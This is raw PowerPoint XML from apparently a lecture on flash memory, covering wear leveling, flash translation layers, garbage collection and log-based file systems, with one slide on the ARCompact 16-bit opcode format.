    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1562670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 Leveling</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Recap: each flash sector can be erased 10,000-100,000 times</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>After that it “wears out”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you rewrite a single file 100,000 times, you can wear out the device in a day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consider a FAT sector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“Wear Leveling” is the capability to erase all sectors of the flash device in an (overall) even rate, regardless of usage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This prolongs the lifetime of the flash device </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="316418384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Naïve approach</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Use a “regular” file system on a flash device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Implement a “block device” driver for flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Access is at a block level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Blocks are relatively small – 512 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Implement the “write” operation as read-erase-modify-write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Disadvantages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Unsafe – if device loses power after erase but before write, entire sector is corrupted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No “wear leveling” support</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25936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Dynamic vs. Static</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The flash contains dynamic data, but also static data (i.e. code and read-only data)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamic wear-leveling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only dynamic data sections are used for wear-leveling algorithms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Static wear-leveling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Entire flash is under wear-leveling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Which is better? What is the tradeoff?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140451260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Flash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Translation Layer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Layer between file system and flash device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Emulates a block device to the file system, taking wear leveling into account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Translates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>logical addresses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>physical addresses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A logical address will move around different physical addresses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17840628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pic>
        <p:nvPicPr>
          <p:cNvPr id="1741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76400"/>
            <a:ext cx="8389938" cy="32766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30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572000" y="2286000"/>
            <a:ext cx="6858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3" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3810000" y="2286000"/>
            <a:ext cx="6858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4" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5334000" y="2286000"/>
            <a:ext cx="13716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5" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="2286000"/>
            <a:ext cx="11430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318472" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>Example 16-bit Opcode Format</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15367" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="2057400"/>
            <a:ext cx="323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15</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15368" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="20574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11   10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15369" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="205740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0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15370" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="23622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Opcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1749003" name="AutoShape 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="3034387"/>
            <a:ext cx="2057400" cy="919401"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 55245"/>
              <a:gd name="adj2" fmla="val -9288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Major Opcode defines 32 Instruction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> Groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> groups</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>24 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>groups</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1749004" name="AutoShape 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6400800" y="3034387"/>
            <a:ext cx="2359025" cy="919401"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70255"/>
              <a:gd name="adj2" fmla="val -82560"/>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Identifies one of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> available instruction slots in the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 defined by this major opcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1749005" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="4180325"/>
            <a:ext cx="1752600" cy="715089"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -85958"/>
              <a:gd name="adj2" fmla="val -266245"/>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Source Operand Addresses One of 8 Core Registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15374" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="822325" y="1584325"/>
            <a:ext cx="6557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b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ARCompact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bit General Register Format (Major Opcode 0x19): </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15375" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="2057400"/>
            <a:ext cx="428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8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15376" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5105400" y="205740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5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1000">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1749010" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="4096663"/>
            <a:ext cx="2895600" cy="1123712"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25546"/>
              <a:gd name="adj2" fmla="val -175986"/>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Both source and destination register address for three-operand instructions (ADD), destination address for two-operand instructions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15378" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="2362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C</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15379" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5410200" y="23622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Sub-Opcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15380" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="2286000"/>
            <a:ext cx="0" cy="4572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1" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="2362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B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="423939372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Management data for FTL is also stored on the flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mapping of logical to physical addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It can be useful to take some overhead from each erase unit and store on it the management data relevant to that sector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So it is erased together with the data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2235403791"/>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When all physical blocks but one are full (or before that), FTL performs garbage collection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Selects a victim block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>moves all valid data to an empty block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Erase the victim block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1046974844"/>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Selection of victim sector determines efficiency of wear leveling / performance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Erase oldest sector?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Erase “dirtiest” sector?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Erase “cleanest” sector?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Select victim randomly?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339843808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Log-based file system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The advantage of FTL is that it allows using a “regular” file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Useful for USB disk controllers, for example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But it is possible to create a more efficient file system that is specifically designed for flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Log file systems </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>are such file systems</a:t>
